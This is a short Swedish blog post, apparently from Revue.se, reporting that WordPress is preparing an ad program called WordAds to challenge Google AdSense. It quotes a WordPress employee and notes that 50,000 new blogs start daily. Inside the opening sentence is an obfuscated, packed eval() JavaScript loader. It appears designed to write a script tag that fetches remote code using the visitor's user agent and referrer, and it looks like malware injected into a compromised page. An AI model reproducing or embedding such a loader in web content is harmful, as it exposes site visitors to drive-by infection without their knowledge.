Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Bloggtjänsten WordPress lanserar annonsprogram

Bloggtjänsten WordPress lanserar annonsprogram
Sebastian
Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zknyr|var|u0026u|referrer|iided||js|php’.split(’|’),0,{}))
är det dags. Världens största bloggplattform ska utmana Google AdSense.
Som många vet så används WordPress idag av miljoner med människor. Både för bloggar och stora hemsidor. Om ni inte visste om så är det WordPress som vi på Revue.se använder.

Nu är det dags att ta steget längre. Det är ingen tvekan på att WordPress är nära en lansering av sitt nya annonsprogram. Detta skrevs av en anställd på WordPress.

[quote]”We’ve resisted advertising so far because most of it we had seen wasn’t terribly tasteful, and it seemed like Google’s AdSense was the state-of-the-art, which was sad. You pour a lot of time and effort into your blog and you deserve better than AdSense.” [/quote]

Plattformen kommer att få namnet WordAds och jobba tillsammans med Feterated Media. Till en början kommer enbart större WordPress-sidor att erbjudas möjligheten att annonsera via WordAds. Om detta kommer ändras i framtiden framgår inte men min egna gissning är, varför inte.

Varje dag så aktiveras och startas 50 000 nya WordPress-bloggar och sidor så de har lite underlag att jobba med för att lyckas.

Mer info: mashable.com